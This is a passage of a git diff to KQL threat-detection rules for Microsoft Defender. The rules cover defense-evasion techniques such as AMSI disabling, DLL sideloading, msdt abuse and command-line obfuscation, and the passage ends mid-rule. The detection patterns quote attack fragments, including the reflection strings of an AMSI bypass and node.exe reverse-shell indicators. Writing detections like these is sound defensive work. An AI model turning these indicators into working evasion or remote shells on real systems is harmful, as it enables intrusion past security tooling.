Level: high +// Description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "System.Management.Automation.AmsiUtils" and ProcessCommandLine contains "amsiInitFailed") or (ProcessCommandLine contains "[Ref].Assembly.GetType" and ProcessCommandLine contains "SetValue($null,$true)" and ProcessCommandLine contains "NonPublic,Static") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql b/KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql index ce646212..b848e165 100644 --- a/KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql +++ b/KQL/rules/Defense Evasion/potential_amsi_com_server_hijacking.kql @@ -1,10 +1,10 @@ -// Title: Potential AMSI COM Server Hijacking -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-04 -// Level: high -// Description: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 - -DeviceRegistryEvents +// Title: Potential AMSI COM Server Hijacking +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-04 +// Level: high +// Description: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents | where RegistryKey endswith "\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32\\(Default)" and (not(RegistryValueData =~ "%windir%\\system32\\amsi.dll")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql index 547d4adf..d29ed7b6 100644 --- a/KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql +++ b/KQL/rules/Defense Evasion/potential_antivirus_software_dll_sideloading.kql @@ -1,14 +1,14 @@ -// Title: Potential Antivirus Software DLL Sideloading -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022-08-17 -// Level: medium -// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused. -// - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file. -// - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file - -DeviceImageLoadEvents +// Title: Potential Antivirus Software DLL Sideloading +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) +// Date: 2022-08-17 +// Level: medium +// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused. +// - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file. +// - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file + +DeviceImageLoadEvents | where (FolderPath endswith "\\log.dll" and (not(((FolderPath in~ ("C:\\Program Files\\AVAST Software\\Avast\\log.dll", "C:\\Program Files (x86)\\AVAST Software\\Avast\\log.dll")) or (FolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\log.dll", "C:\\Program Files (x86)\\AVG\\Antivirus\\log.dll")) or (FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not(((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\") or (FolderPath startswith "C:\\Program Files\\AVG\\Antivirus\\" or FolderPath startswith "C:\\Program Files (x86)\\AVG\\Antivirus\\"))))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith "C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql b/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql index 166c86b8..fcd1f49d 100644 --- a/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql +++ b/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql @@ -1,13 +1,13 @@ -// Title: Potential Application Whitelisting Bypass via Dnx.EXE -// Author: Beyu Denis, oscd.community -// Date: 2019-10-26 -// Level: medium -// Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code. -// Attackers might abuse this in order to bypass application whitelisting. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.t1027.004 -// False Positives: -// - Legitimate use of dnx.exe by legitimate user - -DeviceProcessEvents +// Title: Potential Application Whitelisting Bypass via Dnx.EXE +// Author: Beyu Denis, oscd.community +// Date: 2019-10-26 +// Level: medium +// Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code. +// Attackers might abuse this in order to bypass application whitelisting. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.t1027.004 +// False Positives: +// - Legitimate use of dnx.exe by legitimate user + +DeviceProcessEvents | where FolderPath endswith "\\dnx.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql b/KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql index e8a90e17..d951c614 100644 --- a/KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql +++ b/KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql @@ -1,12 +1,12 @@ -// Title: Potential Arbitrary Code Execution Via Node.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-09 -// Level: high -// Description: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1127 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Arbitrary Code Execution Via Node.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: high +// Description: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --eval ") and FolderPath endswith "\\node.exe") and (ProcessCommandLine contains ".exec(" and ProcessCommandLine contains "net.socket" and ProcessCommandLine contains ".connect" and ProcessCommandLine contains "child_process") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql b/KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql index b3971eb4..1af58858 100644 --- a/KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql +++ b/KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql @@ -1,10 +1,10 @@ -// Title: Potential Arbitrary Command Execution Using Msdt.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-05-29 -// Level: high -// Description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1202 - -DeviceProcessEvents +// Title: Potential Arbitrary Command Execution Using Msdt.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-05-29 +// Level: high +// Description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceProcessEvents | where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (ProcessCommandLine contains "IT_BrowseForFile=" or (ProcessCommandLine contains " PCWDiagnostic" and (ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af " or ProcessCommandLine contains " –af " or ProcessCommandLine contains " —af " or ProcessCommandLine contains " ―af "))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql b/KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql index 3839334e..05f7e90e 100644 --- a/KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql +++ b/KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql @@ -1,10 +1,10 @@ -// Title: Potential Arbitrary DLL Load Using Winword -// Author: Victor Sergeev, oscd.community -// Date: 2020-10-09 -// Level: medium -// Description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1202 - -DeviceProcessEvents +// Title: Potential Arbitrary DLL Load Using Winword +// Author: Victor Sergeev, oscd.community +// Date: 2020-10-09 +// Level: medium +// Description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceProcessEvents | where (ProcessCommandLine contains "/l " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\WINWORD.exe" or ProcessVersionInfoOriginalFileName =~ "WinWord.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql b/KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql index 391e2400..c9a15cd8 100644 --- a/KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql +++ b/KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql @@ -1,10 +1,10 @@ -// Title: Potential Arbitrary File Download Using Office Application -// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community -// Date: 2022-05-17 -// Level: high -// Description: Detects potential arbitrary file download using a Microsoft Office application -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1202 - -DeviceProcessEvents +// Title: Potential Arbitrary File Download Using Office Application +// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community +// Date: 2022-05-17 +// Level: high +// Description: Detects potential arbitrary file download using a Microsoft Office application +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceProcessEvents | where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and ((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql b/KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql index 8c9a2ba9..e9eb483b 100644 --- a/KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql +++ b/KQL/rules/Defense Evasion/potential_attachment_manager_settings_associations_tamper.kql @@ -1,12 +1,12 @@ -// Title: Potential Attachment Manager Settings Associations Tamper -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-01 -// Level: high -// Description: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Potential Attachment Manager Settings Associations Tamper +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-01 +// Level: high +// Description: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations*" and ((RegistryValueData =~ "DWORD (0x00006152)" and RegistryKey endswith "\\DefaultFileTypeRisk") or ((RegistryValueData contains ".zip;" or RegistryValueData contains ".rar;" or RegistryValueData contains ".exe;" or RegistryValueData contains ".bat;" or RegistryValueData contains ".com;" or RegistryValueData contains ".cmd;" or RegistryValueData contains ".reg;" or RegistryValueData contains ".msi;" or RegistryValueData contains ".htm;" or RegistryValueData contains ".html;") and RegistryKey endswith "\\LowRiskFileTypes")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql b/KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql index cfa6d3e8..97a36539 100644 --- a/KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql +++ b/KQL/rules/Defense Evasion/potential_attachment_manager_settings_attachments_tamper.kql @@ -1,12 +1,12 @@ -// Title: Potential Attachment Manager Settings Attachments Tamper -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-01 -// Level: high -// Description: Detects tampering with attachment manager settings policies attachments (See reference for more information) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Potential Attachment Manager Settings Attachments Tamper +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-01 +// Level: high +// Description: Detects tampering with attachment manager settings policies attachments (See reference for more information) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments*" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\HideZoneInfoOnProperties") or (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SaveZoneInformation") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\ScanWithAntiVirus")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql b/KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql index 370a54d4..2a25463c 100644 --- a/KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql +++ b/KQL/rules/Defense Evasion/potential_autologger_sessions_tampering.kql @@ -1,10 +1,10 @@ -// Title: Potential AutoLogger Sessions Tampering -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-01 -// Level: high -// Description: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceRegistryEvents +// Title: Potential AutoLogger Sessions Tampering +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-01 +// Level: high +// Description: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceRegistryEvents | where (RegistryKey endswith "\\System\\CurrentControlSet\\Control\\WMI\\Autologger*" and (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\EventLog-" or RegistryKey contains "\\Defender") and (RegistryKey endswith "\\Enable" or RegistryKey endswith "\\Start"))) and (not(((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\") and (RegistryKey endswith "\\DefenderApiLogger*" or RegistryKey endswith "\\DefenderAuditLogger*")) or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql b/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql index ccc28b9a..2dc301ff 100644 --- a/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql +++ b/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql @@ -1,10 +1,10 @@ -// Title: Potential Base64 Decoded From Images -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-12-20 -// Level: high -// Description: Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1140 - -DeviceProcessEvents +// Title: Potential Base64 Decoded From Images +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-12-20 +// Level: high +// Description: Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140 + +DeviceProcessEvents | where (ProcessCommandLine contains "base64" and ProcessCommandLine contains "-d" and ProcessCommandLine contains ">") and (ProcessCommandLine contains ".avif" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jfif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".pjp" or ProcessCommandLine contains ".pjpeg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".svg" or ProcessCommandLine contains ".webp") and FolderPath endswith "/bash" and (ProcessCommandLine contains "tail" and ProcessCommandLine contains "-c") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql b/KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql index 9357a925..abf1edc8 100644 --- a/KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql +++ b/KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql @@ -1,12 +1,12 @@ -// Title: Potential Binary Proxy Execution Via VSDiagnostics.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-03 -// Level: medium -// Description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate usage for tracing and diagnostics purposes - -DeviceProcessEvents +// Title: Potential Binary Proxy Execution Via VSDiagnostics.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-03 +// Level: medium +// Description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage for tracing and diagnostics purposes + +DeviceProcessEvents | where (ProcessCommandLine contains " /launch:" or ProcessCommandLine contains " -launch:") and ProcessCommandLine contains "start" and (FolderPath endswith "\\VSDiagnostics.exe" or ProcessVersionInfoOriginalFileName =~ "VSDiagnostics.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql index e87c0fb8..ba4caee4 100644 --- a/KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql +++ b/KQL/rules/Defense Evasion/potential_ccleanerdu_dll_sideloading.kql @@ -1,12 +1,12 @@ -// Title: Potential CCleanerDU.DLL Sideloading -// Author: X__Junior (Nextron Systems) -// Date: 2023-07-13 -// Level: medium -// Description: Detects potential DLL sideloading of "CCleanerDU.dll" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - False positives could occur from other custom installation paths. Apply additional filters accordingly. - -DeviceImageLoadEvents +// Title: Potential CCleanerDU.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-13 +// Level: medium +// Description: Detects potential DLL sideloading of "CCleanerDU.dll" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - False positives could occur from other custom installation paths. Apply additional filters accordingly. + +DeviceImageLoadEvents | where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql index c64e73bf..0236ab9d 100644 --- a/KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql +++ b/KQL/rules/Defense Evasion/potential_ccleanerreactivator_dll_sideloading.kql @@ -1,12 +1,12 @@ -// Title: Potential CCleanerReactivator.DLL Sideloading -// Author: X__Junior -// Date: 2023-07-13 -// Level: medium -// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - False positives could occur from other custom installation paths. Apply additional filters accordingly. - -DeviceImageLoadEvents +// Title: Potential CCleanerReactivator.DLL Sideloading +// Author: X__Junior +// Date: 2023-07-13 +// Level: medium +// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - False positives could occur from other custom installation paths. Apply additional filters accordingly. + +DeviceImageLoadEvents | where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql index 6b0ed7b2..cbfbe203 100644 --- a/KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql +++ b/KQL/rules/Defense Evasion/potential_chrome_frame_helper_dll_sideloading.kql @@ -1,10 +1,10 @@ -// Title: Potential Chrome Frame Helper DLL Sideloading -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022-08-17 -// Level: medium -// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 - -DeviceImageLoadEvents +// Title: Potential Chrome Frame Helper DLL Sideloading +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) +// Date: 2022-08-17 +// Level: medium +// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents | where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql b/KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql index 46ae6352..7a92d063 100644 --- a/KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql +++ b/KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql @@ -1,13 +1,13 @@ -// Title: Potential Command Line Path Traversal Evasion Attempt -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-10-26 -// Level: medium -// Description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036 -// False Positives: -// - Google Drive -// - Citrix - -DeviceProcessEvents +// Title: Potential Command Line Path Traversal Evasion Attempt +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-10-26 +// Level: medium +// Description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 +// False Positives: +// - Google Drive +// - Citrix + +DeviceProcessEvents | where (((ProcessCommandLine contains "\\..\\Windows\\" or ProcessCommandLine contains "\\..\\System32\\" or ProcessCommandLine contains "\\..\\..\\") and FolderPath contains "\\Windows\\") or ProcessCommandLine contains ".exe\\..\\") and (not((ProcessCommandLine contains "\\Citrix\\Virtual Smart Card\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\..\\" or ProcessCommandLine contains "\\Google\\Drive\\googledrivesync.exe\\..\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql index c7bff6f6..b45535bc 100644 --- a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql +++ b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql @@ -1,10 +1,10 @@ -// Title: Potential Commandline Obfuscation Using Escape Characters -// Author: juju4 -// Date: 2018-12-11 -// Level: medium -// Description: Detects potential commandline obfuscation using known escape characters -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1140 - -DeviceProcessEvents +// Title: Potential Commandline Obfuscation Using Escape Characters +// Author: juju4 +// Date: 2018-12-11 +// Level: medium +// Description: Detects potential commandline obfuscation using known escape characters +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140 + +DeviceProcessEvents | where ProcessCommandLine contains "h^t^t^p" or ProcessCommandLine contains "h\"t\"t\"p" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql index c7cb25b5..b533fb41 100644 --- a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql +++ b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql @@ -1,11 +1,11 @@ -// Title: Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image -// Author: frack113, Florian Roth (Nextron Systems), Josh Nickels -// Date: 2024-09-02 -// Level: high -// Description: Detects potential commandline obfuscation using unicode characters. -// Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027 - -DeviceProcessEvents +// Title: Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image +// Author: frack113, Florian Roth (Nextron Systems), Josh Nickels +// Date: 2024-09-02 +// Level: high +// Description: Detects potential commandline obfuscation using unicode characters. +// Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceProcessEvents | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith 